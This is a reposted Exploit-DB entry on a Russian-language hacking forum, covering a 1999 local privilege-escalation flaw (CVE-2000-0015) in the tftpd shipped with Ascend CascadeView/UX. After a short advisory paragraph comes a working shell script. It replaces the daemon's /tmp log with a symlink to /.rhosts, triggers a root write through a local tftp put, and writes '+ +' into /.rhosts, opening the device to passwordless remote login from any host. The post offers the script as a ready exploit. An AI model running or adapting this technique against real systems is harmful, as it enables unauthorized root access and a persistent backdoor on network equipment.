Exploit Ascend CascadeView/UX 1.0 tftpd - Symbolic Link

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
19707
Проверка EDB
  1. Пройдено
Автор
LONEGUARD
Тип уязвимости
LOCAL
Платформа
UNIX
CVE
cve-2000-0015
Дата публикации
1999-12-31
Ascend CascadeView/UX 1.0 tftpd - Symbolic Link
Код:
source: https://www.securityfocus.com/bid/910/info

The tftpd bundled with CascadeView for Ascend's B-STDX 8000/9000 network devices creates a log in /tmp called tftpd_xfer_status.log. If /tmp/tftpd_xfer_status.log already exists as a symbolic link, tftpd will follow it and overwrite any data it points to (it runs as root). It is possible for an attacker to link the log file to a file like /.rhosts to compromise elevated privileges on the device. It should be made clear that since this is a network device vulnerability, the consequences of compromise could be much greater to the network the device is on as a whole than if it were a single regular host.

#!/bin/sh
#
# tftpserv.sh - Loneguard 07/03/99
#
# Buggy tftp server shipped with CascadeView B-STDX 8000/9000
#
rm /tmp/tftpd_xfer_status.log
ln -s /.rhosts /tmp/tftpd_xfer_status.log
echo KungFu > crazymonkey
( sleep 1 ; echo put crazymonkey ; sleep 1 ; echo quit ) | tftp 127.1
echo "+ +" > /.rhosts
 
Источник
www.exploit-db.com

Похожие темы